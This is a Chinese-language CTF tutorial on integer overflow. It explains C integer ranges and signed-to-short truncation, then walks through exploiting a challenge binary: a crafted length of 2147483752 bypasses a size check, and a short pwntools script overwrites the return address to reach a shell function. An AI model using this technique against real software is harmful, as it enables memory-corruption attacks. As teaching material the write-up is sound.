整数溢出
请先浏览上述链接
| 类型 | 字节 | 范围 |
|---|---|---|
| short int | 2byte | 0~0x7fff 0x8000~0xffff |
| unsigned short int | 2byte | 0~0xffff |
| int | 4byte | 0~0x7fffffff 0x80000000~0xffffffff |
| unsigned int | 4byte | 0~0xffffffff |
| long int | 8byte | 0~0x7fffffffffffffff 0x8000000000000000~0xffffffffffffffff |
| unsigned long int | 8byte | 0~0xffffffffffffffff |
- 当程序中的数据超过其数据类型的范围事,就会造成溢出,整数类型的溢出则被称为整数溢出
- 当一个数类型为有符号int时,如何判断其为正数或者负数,看最高位,最高位为1,则其为负数,最高位为0,则其为正数
example
老规矩,先checksec
放入IDA分析
需要注意4个点
- 输入的v8原本是无符号整数,在1处转为有符号整数
- 并且其不能大于100
- int16实际为short类型,在2处,将v8的值大数变小数,强制类型转换大范围int类型转为小范围short类型的数
- 在3处,通过read函数读入了8个字节(如果不懂8nLL是什么意思,可以跳转到汇编,直接看汇编)
- 在4处,将读入的a字符串,赋给v7,v7是一个char类型数组,可以通过数组越界来写地址
程序逻辑
- 首先输入一个长度,该长度不能超过100
- 然后输入内容,通过输入的内容直接跳到system(shell)的地址处
- 根据IDA可以看出,v7数组与rbp的偏移是0x60,十进制是96
- ebp是8,所以应该从104开始写shell地址
- 104需要绕过100的限制
- 利用上小节中说的无符号int和有符号int转换,令最高位为1即可
- 并且在int转为short类型时,需要控制最低两个字节,使它们索引到返回地址处。
- 我们可用0x80000068这个长度,换成十进制是2147483752。
编写EXP
from pwn import *
sh = process('./input_6f4254b6f89d07d06813fc8bbcd1a057')
success_add = 0x00000000004007BA
#payload = 'a' * 8 + p64(success_add)
//如果read函数可以读更多字节的话,也可不用绕过100的限制,先覆盖ebp的值,再覆盖返回地址的值
payload = p64(success_add)
print payload
sh.recv()
sh.sendline("2147483752")
sh.recv()
sh.sendline(payload)
sh.interactive()
